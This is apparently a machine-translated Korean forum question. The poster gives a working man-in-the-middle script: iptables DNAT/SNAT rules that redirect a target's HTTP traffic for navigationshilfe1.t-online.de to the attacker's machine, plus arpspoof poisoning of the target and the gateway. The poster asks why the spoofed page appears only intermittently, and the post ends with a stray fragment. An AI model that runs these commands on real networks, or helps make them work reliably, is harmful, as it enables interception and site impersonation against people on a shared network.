로컬 네트워크에서 중간자 공격을 시도하고 navigationshilfe1.t-online.de 서버를 내 서버로 바꾸려고합니다. 나중에 http 서비스 대신 사용자 정의 서비스를 교체하고 싶습니다. 내 현재 스크립트는 다음과 같습니다
sysctl -w net.ipv4.ip_forward=1
export TARGET=192.168.2.104
export ATTACKER=192.168.2.115
export GATEWAY=192.168.2.1
export SITE=62.138.238.45 # navigationshilfe1.t-online.de
iptables -t nat -F
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -d $SITE -j DNAT --to-destination $ATTACKER:80
iptables -t nat -A POSTROUTING -p tcp -s $ATTACKER --source-port 80 -j SNAT --to-source $SITE:80
iptables -t nat -L -n -v
arpspoof -i eth0 -c both -t $TARGET -r $GATEWAY
문제는 때로는 대상의 웹 브라우저가 실제 사이트를 표시하고 페이지를 몇 번 새로 고치면 가짜 페이지를 표시하고 그 반대도 마찬가지라는 것입니다. 연결이 왜 나쁜지 아는 사람이 있습니까?
iptables
(처음에는 HTTP 트래픽을 가로 채고 싶을 것입니다).